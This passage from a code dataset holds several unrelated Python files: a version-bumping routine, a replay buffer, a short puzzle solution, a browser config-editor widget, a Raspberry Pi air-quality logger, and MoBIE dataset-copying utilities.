scheme == 'zerover':\n parts = (0, ) + parts[1:]\n if rule in constants.VERSION_MAJOR:\n return '{}.0.0'.format(parts[0] + 1)\n if rule in constants.VERSION_MINOR:\n return '{}.{}.0'.format(parts[0], parts[1] + 1)\n if rule in constants.VERSION_PATCH:\n return '{}.{}.{}'.format(parts[0], parts[1], parts[2] + 1)\n\n if scheme in ('semver', 'romver', 'zerover'):\n if rule in constants.VERSION_PRE:\n pre = version.pre[1] if version.pre 
else 0\n            return '{}.{}.{}-rc.{}'.format(*parts[:3], pre + 1)\n        if rule in constants.VERSION_LOCAL:\n            pre = '-{}.{}'.format(*version.pre) if version.pre else ''\n            local = int(version.local) if version.local else 0\n            return '{}.{}.{}{}+{}'.format(*parts[:3], pre, local + 1)\n\n    if scheme == 'pep':\n        if rule in constants.VERSION_PRE:\n            pre = version.pre[1] if version.pre else 0\n            return '{}.{}.{}rc{}'.format(*parts[:3], pre + 1)\n        if rule in constants.VERSION_POST:\n            # PEP allows post-releases for pre-releases,\n            # but it is \"strongly discouraged\", so let's ignore it.\n            return '{}.{}.{}.post{}'.format(*parts[:3], (version.post or 0) + 1)\n        if rule in constants.VERSION_DEV:\n            if version.pre:\n                suffix = 'rc{}'.format(version.pre[1])\n            elif version.post:\n                suffix = '.post{}'.format(version.post)\n            else:\n                suffix = ''\n            return '{}.{}.{}{}.dev{}'.format(*parts[:3], suffix, (version.dev or 0) + 1)\n        if rule in constants.VERSION_LOCAL:\n            old = str(version).split('+')[0]\n            local = int(version.local) if version.local else 0\n            return '{}+{}'.format(old, local + 1)\n\n    if scheme == 'comver':\n        parts = version.release + (0,)\n        if rule in constants.VERSION_MAJOR:\n            return '{}.0'.format(parts[0] + 1)\n        if rule in constants.VERSION_MINOR:\n            return '{}.{}'.format(parts[0], parts[1] + 1)\n        if rule in constants.VERSION_PRE:\n            pre = version.pre[1] if version.pre else 0\n            return '{}.{}-rc.{}'.format(*parts[:2], pre + 1)\n        if rule in constants.VERSION_LOCAL:\n            pre = '-{}.{}'.format(*version.pre) if version.pre else ''\n            local = int(version.local) if version.local else 0\n            return '{}.{}{}+{}'.format(*parts[:2], pre, local + 1)\n\n    if scheme == 'calver':\n        today = date.today()\n        if rule in constants.VERSION_MAJOR:\n            return '{}.{}'.format(today.year, today.month)\n        if rule in constants.VERSION_PATCH:\n            if version.release[0] == today.year and version.release[1] == today.month:\n                micro = (version.release + (0, 0))[2]\n                micro = today.day if micro < today.day else micro + 1\n            else:\n                micro = today.day\n            return '{}.{}.{}'.format(today.year, today.month, micro)\n","sub_path":"dephell/actions/_version.py","file_name":"_version.py","file_ext":"py","file_size_in_byte":6797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"584261815","text":"\"\"\"\nData structure for implementing experience replay\n\"\"\"\nimport random\nimport numpy as np\n\n\nclass Buffer(object):\n\n def __init__(self, buffer_size, terminal_buffer_size, state_dim, action_dim, reward_dim, random_seed=123):\n \"\"\"\n The right side of the deque contains the most recent experiences\n \"\"\"\n self.buffer_size = buffer_size\n self.terminal_buffer_size = terminal_buffer_size\n self.state_dim = state_dim\n self.action_dim = action_dim\n self.reward_dim = reward_dim\n self.count = 0\n self.terminal_count = 0\n self.test_count = 0\n self.database = np.array(([[]]))\n self.database_ter = np.array(([[]]))\n self.buffer = np.array(([[]]))\n self.terminal_buffer = np.array(([[]]))\n# self.test_buffer = np.array(([[]]))\n random.seed(random_seed)\n\n def data_add(self, args):\n experience = args\n if len(self.database[0]) == 0:\n self.database = experience\n else:\n self.database = np.concatenate((self.database, experience))\n\n\n def data_ter_add(self, args):\n experience = args\n if len(self.database_ter[0]) == 0:\n self.database_ter = np.array([experience])\n else:\n self.database_ter = np.concatenate((self.database_ter, np.array([experience])))\n\n def add(self, args):\n experience = args\n if self.count < self.buffer_size:\n if len(self.buffer[0]) == 0:\n self.buffer = experience\n else:\n self.buffer = np.concatenate((self.buffer, experience))\n\n self.count += 1\n\n else:\n self.buffer = np.delete(self.buffer, 0, 0)\n self.buffer = np.concatenate((self.buffer, experience))\n\n def terminal_add(self, args):\n experience = args\n if self.terminal_count < self.terminal_buffer_size:\n if len(self.terminal_buffer[0]) == 0:\n self.terminal_buffer = np.array([experience])\n else:\n self.terminal_buffer = np.concatenate((self.terminal_buffer, np.array([experience])))\n\n self.terminal_count += 1\n else:\n self.terminal_buffer = np.delete(self.terminal_buffer, 0, 0)\n self.terminal_buffer = np.concatenate((self.termianl_buffer, [experience]))\n\n def size(self):\n return self.count\n\n def terminal_size(self):\n return self.terminal_count\n\n def Make_buffer(self, number):\n if len(self.database) < number:\n sampled = self.database\n else:\n sampled = np.array(random.sample(list(self.database), number))\n self.add(sampled)\n\n def Make_buffer_ter(self, number):\n sampled = np.array(random.sample(list(self.database_ter), number))\n self.terminal_add(sampled)\n\n def sample_batch(self, batch_size):\n batch = []\n self.count = len(self.buffer)\n if self.count < batch_size:\n batch = random.sample(list(self.buffer), self.count)\n else:\n batch = random.sample(list(self.buffer), batch_size)\n\n s_batch = np.array([i[0:self.state_dim] for i in batch])\n a_batch = np.array([i[self.state_dim:self.state_dim+self.action_dim] for i in batch])\n r_batch = np.array([i[self.state_dim+self.action_dim:self.state_dim+self.action_dim+self.reward_dim] for i in batch])\n ss_batch = np.array([i[self.state_dim+self.action_dim+self.reward_dim:2*self.state_dim+self.action_dim+self.reward_dim] for i in batch])\n return s_batch, a_batch, r_batch , ss_batch\n\n def sample_terminal_batch(self, terminal_batch_size):\n if self.terminal_count < terminal_batch_size:\n terminal_batch = random.sample(list(self.terminal_buffer), self.terminal_count)\n else:\n terminal_batch = random.sample(list(self.terminal_buffer), terminal_batch_size)\n\n st_batch = np.array([i[0:self.state_dim] for i in terminal_batch])\n at_batch = 
np.array([i[self.state_dim:self.state_dim+self.action_dim] for i in terminal_batch])\n rt_batch = np.array([i[self.state_dim+self.action_dim:self.state_dim+self.action_dim+self.reward_dim] for i in terminal_batch])\n sst_batch = np.array([i[self.state_dim+self.action_dim+self.reward_dim:2*self.state_dim+self.action_dim+self.reward_dim] for i in terminal_batch])\n return st_batch, at_batch, rt_batch, sst_batch\n\n","sub_path":"intro/SNU-DQN/Buffer.py","file_name":"Buffer.py","file_ext":"py","file_size_in_byte":4437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"475800690","text":"street=[list(map(int,input().split())) for _ in range(int(input()))]\n\nn=0\navg=sum(street[i][1] for i in range(len(street)))/2\n\nfor p,q in sorted(street, key=lambda x:x[0]):\n n+=q\n if n>=avg:\n print(p)\n break\n","sub_path":"2141_Office.py","file_name":"2141_Office.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"450919294","text":"\ndef make_dropdown(init_value, choices, callback):\n\ta = html.A(init_value, **{'class':'dropdown-toggle', 'data-toggle':'dropdown', \n\t\t\t\t\t\t\t\t'aria-haspopup':'true', 'aria-expanded':'false', \n\t\t\t\t\t\t\t\t'id':'config_editor_select_id_1'})\n\tll = html.DIV(**{'class':'dropdown-menu', 'aria-labelledby':'config_editor_select_id_1'})\n\tdropdown = html.TD(a + ll, **{'class':'dropdown'})\n\tfor c in choices:\n\t\tli = html.A(c, **{'class':'dropdown-item small'})\n\t\tll <= li\n\t\tdef on_click(ev):\n\t\t\ta.text = ev.target.text\n\t\t\tcallback(ev.target.text)\n\t\tli.bind('click', on_click)\n\treturn dropdown\n\nclass config_editor_obj:\n\tdef __init__(self):\n\t\tself.type_name = 'config_editor'\n\t\tself.elt = html.DIV()\n\t\tself.event_listener = None\n\t\tself.item = None\n\t\tself.item_table = None\n\t\tself.config_names = []\n\t\tself.item_name = ''\n\t\tself.key_column = 0\n\t\tself.config_column = None\n\t\tself.options = []\n\t\tself.del_btn = None\n\n\tdef mounted(self, config, is_editing, edit_listener):\n\t\tif 'attr' in config:\n\t\t\tattr = config['attr']\n\t\t\tif 'config_names' in attr:\n\t\t\t\tself.config_names = attr['config_names'].split(',')\n\t\t\tif 'item_name' in attr:\n\t\t\t\tself.item_name = attr['item_name']\n\t\t\tif 'key_column' in attr:\n\t\t\t\ttry:\n\t\t\t\t\tself.key_column = int(attr['key_column'])\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tif 'config_column' in attr:\n\t\t\t\ttry:\n\t\t\t\t\tself.config_column = int(attr['config_column'])\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\tif 'options' in attr:\n\t\t\t\tself.options = attr['options'].strip().split(';')\n\t\t\t\tself.options = [[o.strip() for o in options.strip().split(',') if o.strip() != ''] for options in self.options]\n\t\t\twhile len(self.options) < len(self.config_names):\n\t\t\t\tself.options.append([])\n\n\n\tdef use_example_data(self):\n\t\tself.item = {'rows':[['名称1']]}\n\t\tself.set_data(None, self.item)\n\n\tdef get_data(self, data_name):\n\t\treturn self.item\n\n\tdef set_data(self, data_name, data):\n\t\tself.item = None\n\t\tself.elt.clear()\n\t\tif data is None: return\n\t\tself.item = data\n\t\trow = self.item['rows'][0]\n\t\ttb = html.TABLE(**{'class':'small table table-sm table-hover'})\n\t\tself.elt <= tb\n\t\tthead = html.THEAD(**{'class':'thead-dark'})\n\t\ttb <= thead\n\t\ttbody = html.TBODY()\n\t\ttb <= tbody\n\t\ttr = html.TR()\n\t\tthead <= tr\n\t\ttr <= html.TH()\n\t\ttr <= html.TH(self.item_name+'参数')\n\t\ttr <= html.TH('值')\n\t\t# name\n\t\ta1 = html.A(row[self.key_column], **{'contenteditable':'true'})\n\t\ttr = html.TR(**{'class':'table-info'})\n\t\ttbody <= tr\n\t\ttr <= html.TD()\n\t\ttr <= html.TD(self.item_name+'名称')\n\t\ttr <= html.TD(a1)\n\t\tdef onblur1(ev):\n\t\t\tnonlocal a1\n\t\t\ttext = a1.text.strip()\n\t\t\tif text != row[self.key_column]:\n\t\t\t\trow[self.key_column] = text\n\t\t\t\tself.del_btn.text = '删除'+self.item_name+' \"'+text+'\"'\n\t\t\t\tif self.event_listener is not None:\n\t\t\t\t\tself.event_listener('change', 'item')\t\n\t\ta1.bind('blur', onblur1)\n\t\t# configs\n\t\tif len(self.config_names) > 0 and self.config_column is not None and self.config_column < len(row):\n\t\t\ttexts = row[self.config_column].split(',')\n\t\t\twhile len(texts) < len(self.config_names):\n\t\t\t\ttexts.append('')\n\t\t\tdef make_td(i):\n\t\t\t\tif len(self.options[i]) > 0:\n\t\t\t\t\tdef callback(option):\n\t\t\t\t\t\tnonlocal texts\n\t\t\t\t\t\tif texts[i] == option: return\n\t\t\t\t\t\ttexts[i] = 
option\n\t\t\t\t\t\trow[self.config_column] = ','.join(texts)\n\t\t\t\t\t\tif self.event_listener is not None:\n\t\t\t\t\t\t\tself.event_listener('change', 'item')\n\t\t\t\t\treturn make_dropdown(texts[i], self.options[i], callback)\n\t\t\t\telse:\n\t\t\t\t\ta2 = html.A(texts[i], **{'contenteditable':'true'})\n\t\t\t\t\tdef onblur2(ev):\n\t\t\t\t\t\tnonlocal texts\n\t\t\t\t\t\ttext = a2.text.strip()\n\t\t\t\t\t\tif texts[i] == text: return \n\t\t\t\t\t\ttexts[i] = text\n\t\t\t\t\t\trow[self.config_column] = ','.join(texts)\n\t\t\t\t\t\tif self.event_listener is not None:\n\t\t\t\t\t\t\tself.event_listener('change', 'item')\n\t\t\t\t\ta2.bind('blur', onblur2)\n\t\t\t\t\treturn html.TD(a2)\t\n\t\t\tfor i,config_name in enumerate(self.config_names):\n\t\t\t\ttr = html.TR(**{'class':'table-info'})\n\t\t\t\ttbody <= tr\n\t\t\t\tconfig_name = config_name.split(':')\n\t\t\t\tif len(config_name) == 1:\n\t\t\t\t\ttr <= html.TD()\n\t\t\t\t\ttr <= html.TD(config_name[0])\n\t\t\t\telse:\n\t\t\t\t\ttr <= html.TD(html.SPAN(config_name[0], **{'class':'badge badge-info'}))\n\t\t\t\t\ttr <= html.TD(config_name[1])\n\t\t\t\ttr <= make_td(i)\n\t\t# delete item\n\t\ttr = html.TR(**{'class':'table-info'})\n\t\ttbody <= tr\n\t\ttr <= html.TD()\n\t\ttr <= html.TD()\n\t\ttd = html.TD()\n\t\ttr <= td\n\t\tself.del_btn = html.BUTTON('删除'+self.item_name+' \"'+row[self.key_column]+'\"', style={'font-size':'smaller'}, **{'type':'button', 'class':'btn-sm btn-dark'})\n\t\ttd <= self.del_btn\n\t\tdef delete_item(ev):\n\t\t\tself.set_data(None, None)\n\t\t\tself.event_listener('change', 'item')\n\t\tdef confirm_delete_item(ev):\n\t\t\tfrom browser import self as window\n\t\t\twindow.confirm_modal('请确认删除'+self.item_name+': ' + row[self.key_column], delete_item)\n\t\tself.del_btn.bind('click', confirm_delete_item)\n\n","sub_path":"HW_2020_09/web/user_data/ui/config_editor.py","file_name":"config_editor.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"576694768","text":"#!/usr/bin/env python3\n\nimport sys\nimport csv\nimport time\nimport matplotlib.pyplot as plt\nfrom subprocess import call\nfrom logger import Logger\nfrom ADS1115 import ADS1115\nfrom SDS011 import SDS011\n\n# Utility function to write headers of the output files\ndef write_file_headers():\n # print raw files headers\n # txt file\n txtraw = open('/home/pi/Desktop/Refactor/rilevazioni/misuredrone' + dataname + '.txt','w')\n txtraw.write('%r %r %r %r %r %r %r %r %r \\n' % ('time_elapsed', 'pm25 [ug]/m3', 'pm10 [ug]/m3', 'WE_NO2 [mV] ', 'AE_NO2 [mV] ', 'WE_CO [mV] ', 'AE_CO [mV]', 'data', 'ora'))\n txtraw.close()\n # csv file\n csvraw = open('/home/pi/Desktop/Refactor/rilevazioni/misuredrone' + dataname + '.csv','w', newline = '')\n csvraw_writer = csv.writer(csvraw, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csvraw_writer.writerow(['time_elapsed', 'pm25 [ug]/m3', 'pm10 [ug]/m3', 'WE_NO2 [mV] ', 'AE_NO2 [mV] ', 'WE_CO [mV] ', 'AE_CO [mV]', 'data', 'ora'])\n csvraw.close()\n \n # print processed files headers\n # txt file\n txtProc = open('/home/pi/Desktop/Refactor/rilevazioni/misuredroneProc' + dataname + '.txt','w')\n txtProc.write('%r %r %r %r %r %r %r %r %r \\n' % ('time_elapsed', 'pm25 [ug]/m3', 'pm10 [ug]/m3', 'NO2 [ug/m3] ', 'CO [ug/m3] ', '/', '/', 'data', 'ora'))\n txtProc.close()\n # csv file\n csvProc = open('/home/pi/Desktop/Refactor/rilevazioni/misuredroneProc' + dataname + '.csv','w', newline = '')\n csvProc_writer = csv.writer(csvProc, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n csvProc_writer.writerow(['time_elapsed', 'pm25 [ug]/m3', 'pm10 [ug]/m3', 'NO2 [ug/m3] ', 'CO [ug/m3] ', '/', '/', 'data', 'ora'])\n csvProc.close()\n\nif __name__ == '__main__':\n\n dataname = time.strftime('%d_%m_%Y_%H_%M_%S') # current date and time to name the files\n sys.stdout = Logger(dataname) # to both show stdout in the console and also save it in a log file\n \n print('ARIA data acquisition')\n print('Serial numbers:')\n print('NO2: 212890332')\n print('CO: 132420228')\n \n## val = input('Type y to confirm serial numbers match: ')\n## if val != 'y':\n## exit(\"Wrong sensors\")\n\n # values for sensor NO2 serial number 212890332\n WE_e_NO2 = 300\n AE_e_NO2 = 305\n sens_NO2 = 0.218\n n_NO2 = 1.9\n\n # values for sensor CO serial number 132420228\n WE_e_CO = 272\n AE_e_CO = 258\n sens_CO = 0.252\n n_CO = -1.5\n \n print('Sensors init')\n part_sensor = SDS011('/dev/ttyUSB0')\n gas_sensor = ADS1115()\n \n print('Read single sample')\n pm25, pm10, tempo = part_sensor.get_data()\n gas = gas_sensor.get_data() \n print(pm25, pm10, gas[0], gas[1], gas[2], gas[3]) # gas[0] = WE_NO2, gas[1] = AE_NO2, gas[2] = WE_CO, gas[3] = AE_CO\n \n print('Init plotting')\n plt.ion()\n fig, ax = plt.subplots(5,1)\n\n # initialize data structures for plots\n BUFF_LEN = 60 # dimension of the buffer which holds the sensor data\n x = []\n y0 = []\n y1 = []\n y2 = []\n y3 = []\n y4 = []\n y5 = []\n l0 = l1 = l2 = l3 = l4 = l5 = None\n \n n = 0 # iteration counter\n\n # Write headers of the raw and processed output files\n write_file_headers()\n\n print('Enter acquisition loop')\n\n # Start time count\n start_time = time.time()\n\n # Read mavlink_time_linker output\n pixhawk_time_file = open('pixhawk_time.txt', 'r')\n pixhawk_time = pixhawk_time_file.read()\n print('pixhawk time = ' + pixhawk_time)\n pixhawk_time_file.close()\n \n while True:\n \n time_elapsed = time.time() - start_time\n\n print(\"Time elapsed: \" + str(time_elapsed))\n \n # get data from 
sensors\n        pm25, pm10, tempo = part_sensor.get_data()\n        gas = gas_sensor.get_data()\n        \n        print(\"pm25 pm10 WE_NO2 AE_NO2 WE_CO AE_CO\") \n        \n        print(\"%5.3f %5.3f %5.3f %5.3f %5.3f %5.3f\" % (pm25, pm10, gas[0], gas[1], gas[2], gas[3]), \" measured values\")\n\n        # Write raw data to txt\n        txtraw = open('/home/pi/Desktop/Refactor/rilevazioni/misuredrone' + dataname + '.txt','a')\n        txtraw.write('%r %r %r %r %r %r %r %r %r \\n' % (time_elapsed, pm25, pm10, gas[0], gas[1], gas[2], gas[3], time.strftime('%d/%m/%Y'), time.strftime('%H:%M:%S')))\n        txtraw.close()\n\n        # Write raw data to csv\n        csvraw = open('/home/pi/Desktop/Refactor/rilevazioni/misuredrone' + dataname + '.csv','a', newline = '')\n        csvraw_writer = csv.writer(csvraw, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n        csvraw_writer.writerow([time_elapsed, pm25, pm10, gas[0], gas[1], gas[2], gas[3], time.strftime('%d/%m/%Y'), time.strftime('%H:%M:%S')])\n        csvraw.close()\n\n        # Convert raw ADC readings (mV) to engineering values in ppb,\n        # using the per-sensor electronic offsets and sensitivities defined above\n        gaspic = [0, 0, 0, 0]\n        gaspic[0] = ((gas[0] - WE_e_NO2) - (n_NO2 * (gas[1] - AE_e_NO2))) / sens_NO2 # NO2 sensor\n        gaspic[1] = ((gas[2] - WE_e_CO) - (n_CO * (gas[3] - AE_e_CO))) / sens_CO # CO sensor\n        gaspic[2] = 0.0 # (gas[2] - 260)/ 0.369 # NO sensor (disabled)\n        gaspic[3] = 0.0 # gas[3]*4.1569 - 1269.6 # PID ( VOCs ) (disabled)\n        \n        print(\"pm25 pm10 NO2 CO NO VOCs\") \n        print(\"%5.3f %5.3f %5.3f %5.3f %5.3f %5.3f\" % (pm25, pm10, gaspic[0], gaspic[1], gaspic[2], gaspic[3]), \" plotted values (ppb; pm in ug/m^3, VOCs in mV)\")\n        \n        # convert from ppb to ug/m^3\n        gasmicro = [0, 0, 0, 0]\n        gasmicro[0] = gaspic[0] * 1.88 # NO2\n        gasmicro[1] = gaspic[1] * 1.145 # CO\n        gasmicro[2] = gaspic[2] * 1.45 # NO (== 0)\n        gasmicro[3] = gaspic[3] # VOCs (== 0)\n\n        # Write processed data to txt\n        txtProc = open('/home/pi/Desktop/Refactor/rilevazioni/misuredroneProc' + dataname + '.txt','a')\n        txtProc.write('%r %r %r %r %r %r %r %r %r \\n' % (time_elapsed, pm25, pm10, gasmicro[0], gasmicro[1], gasmicro[2], gasmicro[3], time.strftime('%d/%m/%Y'), time.strftime('%H:%M:%S')))\n        txtProc.close()\n\n        # Write processed data to csv\n        csvProc = open('/home/pi/Desktop/Refactor/rilevazioni/misuredroneProc' + dataname + '.csv','a', newline = '')\n        csvProc_writer = csv.writer(csvProc, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n        csvProc_writer.writerow([time_elapsed, pm25, pm10, gasmicro[0], gasmicro[1], gasmicro[2], gasmicro[3], time.strftime('%d/%m/%Y'), time.strftime('%H:%M:%S')])\n        csvProc.close()\n\n        print(\"%5.3f %5.3f %5.3f %5.3f %5.3f %5.3f\" % (pm25, pm10, gasmicro[0], gasmicro[1], gasmicro[2], gasmicro[3]), \" plotted values (micrograms/m^3; pm in ug/m^3, VOCs in mV)\") \n        \n        print(\"\\n\")\n\n        # Plot in console\n        # Store into the ring buffers\n        x.append(time_elapsed)\n        y0.append(pm25)\n        y1.append(pm10)\n        y2.append(gasmicro[0]) # NO2\n        y3.append(gasmicro[1]) # CO\n        y4.append(gaspic[2]) # NO\n        y5.append(gaspic[3]) # VOCs\n        if len(x) > BUFF_LEN: # keep only the latest BUFF_LEN samples\n            x = x[-BUFF_LEN:]\n            y0 = y0[-BUFF_LEN:]\n            y1 = y1[-BUFF_LEN:]\n            y2 = y2[-BUFF_LEN:]\n            y3 = y3[-BUFF_LEN:]\n            y4 = y4[-BUFF_LEN:]\n            y5 = y5[-BUFF_LEN:]\n\n        # Plot: create the line artists on the first iteration, then only update their data\n        if n == 0:\n            l0, = ax[0].plot(x, y0,'-*', alpha=0.8) # pm2.5\n            l1, = ax[0].plot(x, y1, 'y-s', alpha=0.8) # pm10\n            l2, = ax[1].plot(x, y2, 'r-o', alpha=0.8) # NO2\n            l3, = ax[2].plot(x, y3, 'g-o', alpha=0.8) # CO\n            l4, = ax[3].plot(x, y4, 'c-*', alpha=0.8) # NO\n            l5, = ax[4].plot(x, y5, 'k-*', alpha=0.8) # VOCs\n        else:\n            l0.set_data(x, y0)\n            ax[0].relim()\n            ax[0].autoscale_view()\n            ax[0].set_ylabel('pm [ug]')\n            l1.set_data(x, y1)\n            ax[0].relim()\n            ax[0].autoscale_view()\n            ax[0].legend(( l0, l1),('pm 2.5','pm 10'))\n            l2.set_data(x, y2)\n            ax[1].relim()\n            ax[1].autoscale_view()\n            ax[1].set_ylabel(' NO2 [ug/m3] ')\n            l3.set_data(x, y3)\n            ax[2].relim()\n            ax[2].autoscale_view()\n            ax[2].set_ylabel(' CO [ug/m3] ')\n            l4.set_data(x, y4)\n            ax[3].relim()\n            ax[3].autoscale_view()\n            ax[3].set_ylabel(' NO [ppb] ')\n            l5.set_data(x, y5)\n            ax[4].relim()\n            ax[4].autoscale_view()\n            ax[4].set_ylabel(' VOCs [mV] ')\n\n        n = n + 1\n        \n        plt.draw()\n        plt.xlabel('time [s]')\n        \n        plt.pause(1.0)\n\n        # Wait 1 sec before acquiring next data point\n        time.sleep(1.0)","sub_path":"aria.py","file_name":"aria.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"345557483","text":"import json\nimport os\nimport shutil\nimport warnings\nfrom glob import glob\n\nfrom pybdv.metadata import get_data_path, get_bdv_format\nfrom ..xml_utils import copy_xml_with_newpath\n\n\ndef _load_datasets(path):\n try:\n with open(path) as f:\n datasets = json.load(f)\n except (FileNotFoundError, ValueError):\n datasets = {}\n datasets['datasets'] = []\n return datasets\n\n\ndef have_dataset(root, dataset_name):\n path = os.path.join(root, 'datasets.json')\n datasets = _load_datasets(path)\n return dataset_name in datasets['datasets']\n\n\ndef add_dataset(root, dataset_name, is_default):\n path = os.path.join(root, 'datasets.json')\n datasets = _load_datasets(path)\n\n if dataset_name in datasets['datasets']:\n warnings.warn(f\"Dataset {dataset_name} is already present!\")\n else:\n datasets['datasets'].append(dataset_name)\n\n # if this is the only dataset we set it as default\n if is_default or len(datasets) == 1:\n datasets['defaultDataset'] = dataset_name\n\n with open(path, 'w') as f:\n json.dump(datasets, f, sort_keys=True, indent=2)\n\n\ndef get_datasets(root):\n path = os.path.join(root, 'datasets.json')\n datasets = _load_datasets(path)\n return datasets['datasets']\n\n\n#\n# functionalty to copy a dataset folder\n#\n\ndef make_squashed_link(src_file, dst_file, override=False):\n\n if os.path.exists(dst_file):\n if override and os.path.islink(dst_file):\n os.unlink(dst_file)\n elif override and not os.path.islink(dst_file):\n raise RuntimeError(\"Cannot override an actual file!\")\n elif not override:\n return\n\n if os.path.islink(src_file):\n src_file = os.path.realpath(src_file)\n dst_folder = os.path.split(dst_file)[0]\n rel_path = os.path.relpath(src_file, dst_folder)\n os.symlink(rel_path, dst_file)\n\n\ndef copy_xml_file(xml_in, xml_out, storage='local'):\n if storage == 'local':\n data_path = get_data_path(xml_in, return_absolute_path=True)\n bdv_format = get_bdv_format(xml_in)\n xml_dir = os.path.split(xml_out)[0]\n data_path = os.path.relpath(data_path, start=xml_dir)\n copy_xml_with_newpath(xml_in, xml_out, data_path,\n path_type='relative', data_format=bdv_format)\n elif storage == 'remote':\n shutil.copyfile(xml_in, xml_out)\n else:\n raise ValueError(\"Invalid storage spec %s\" % storage)\n\n\ndef copy_image_data(src_folder, dst_folder, exclude_prefixes=[]):\n # load all image properties from the image dict\n image_dict = os.path.join(src_folder, 'images', 'images.json')\n with open(image_dict, 'r') as f:\n image_dict = json.load(f)\n\n for name, properties in image_dict.items():\n type_ = properties['type']\n # don't copy segmentations\n if type_ not in ('image', 'mask'):\n continue\n # check if we exclude this prefix\n prefix = '-'.join(name.split('-')[:4])\n if prefix in exclude_prefixes:\n continue\n # copy the xmls for the different storages\n for storage, relative_xml in properties['storage'].items():\n in_path = os.path.join(src_folder, 'images', relative_xml)\n out_path = os.path.join(dst_folder, 'images', relative_xml)\n # copy the xml\n copy_xml_file(in_path, out_path, storage)\n\n\ndef copy_misc_data(src_folder, dst_folder, copy_misc=None):\n misc_src = os.path.join(src_folder, 'misc')\n misc_dst = os.path.join(dst_folder, 'misc')\n\n # copy the bookmarks\n bookmark_src = os.path.join(misc_src, 'bookmarks')\n bookmark_dst = os.path.join(misc_dst, 'bookmarks')\n\n for bkmrk in glob(os.path.join(bookmark_src, '*.json')):\n bkmrk_out = os.path.join(bookmark_dst, os.path.split(bkmrk)[1])\n shutil.copyfile(bkmrk, 
bkmrk_out)\n\n # copy the leveling.json file\n leveling_src = os.path.join(misc_src, 'leveling.json')\n if os.path.exists(leveling_src):\n shutil.copyfile(leveling_src, os.path.join(misc_dst, 'leveling.json'))\n\n # copy additional data in the misc folder if copy_misc function is given\n if copy_misc is not None:\n copy_misc(src_folder, dst_folder)\n\n\ndef link_id_lut(src_folder, dst_folder, name):\n # for local storage:\n # make link to the previous id look-up-table (if present)\n lut_name = 'new_id_lut_%s.json' % name\n lut_in = os.path.join(src_folder, 'misc', lut_name)\n if not os.path.exists(lut_in):\n return\n lut_out = os.path.join(dst_folder, 'misc', lut_name)\n if not os.path.exists(lut_out):\n rel_path = os.path.relpath(lut_in, os.path.split(lut_out)[0])\n os.symlink(rel_path, lut_out)\n\n\ndef copy_segmentation(src_folder, dst_folder, name, properties):\n # copy the xmls for the different storages\n for storage, relative_xml in properties['storage'].items():\n in_path = os.path.join(src_folder, 'images', relative_xml)\n out_path = os.path.join(dst_folder, 'images', relative_xml)\n # copy the xml\n copy_xml_file(in_path, out_path, storage)\n # link the id look-up-table\n link_id_lut(src_folder, dst_folder, name)\n\n\ndef copy_segmentations(src_folder, dst_folder, exclude_prefixes=[]):\n # load all image properties from the image dict\n image_dict = os.path.join(src_folder, 'images', 'images.json')\n with open(image_dict, 'r') as f:\n image_dict = json.load(f)\n\n for name, properties in image_dict.items():\n type_ = properties['type']\n # only copy segmentations\n if type_ != 'segmentation':\n continue\n # check if we exclude this prefix\n prefix = '-'.join(name.split('-')[:4])\n if prefix in exclude_prefixes:\n continue\n copy_segmentation(src_folder, dst_folder, name, properties)\n\n\ndef copy_tables(src_folder, dst_folder, table_folder=None):\n if table_folder is None:\n table_in = src_folder\n table_out = dst_folder\n else:\n table_in = os.path.join(src_folder, table_folder)\n table_out = os.path.join(dst_folder, table_folder)\n os.makedirs(table_out, exist_ok=True)\n\n table_files = os.listdir(table_in)\n table_files = [ff for ff in table_files if os.path.splitext(ff)[1] == '.csv']\n\n for ff in table_files:\n src_file = os.path.join(table_in, ff)\n dst_file = os.path.join(table_out, ff)\n make_squashed_link(src_file, dst_file)\n\n\ndef copy_all_tables(src_folder, dst_folder):\n image_dict = os.path.join(src_folder, 'images', 'images.json')\n with open(image_dict) as f:\n image_dict = json.load(f)\n\n for name, properties in image_dict.items():\n table_folder = properties.get('tableFolder', None)\n if table_folder is None:\n continue\n copy_tables(src_folder, dst_folder, table_folder)\n\n\ndef copy_and_check_image_dict(src_folder, dst_folder, exclude_prefixes=[]):\n image_dict_in = os.path.join(src_folder, 'images', 'images.json')\n image_dict_out = os.path.join(dst_folder, 'images', 'images.json')\n with open(image_dict_in) as f:\n image_dict = json.load(f)\n\n # TODO check the image dict, use functionality from\n # mobie.metadata.image_dict.validate...\n\n with open(image_dict_out, 'w') as f:\n json.dump(image_dict, f)\n\n\ndef copy_dataset_folder(src_folder, dst_folder, exclude_prefixes=[], copy_misc=None):\n copy_image_data(src_folder, dst_folder, exclude_prefixes)\n copy_misc_data(src_folder, dst_folder, copy_misc)\n copy_segmentations(src_folder, dst_folder, exclude_prefixes)\n copy_all_tables(src_folder, dst_folder)\n copy_and_check_image_dict(src_folder, 
dst_folder,\n exclude_prefixes=exclude_prefixes)\n","sub_path":"mobie/metadata/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":7712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
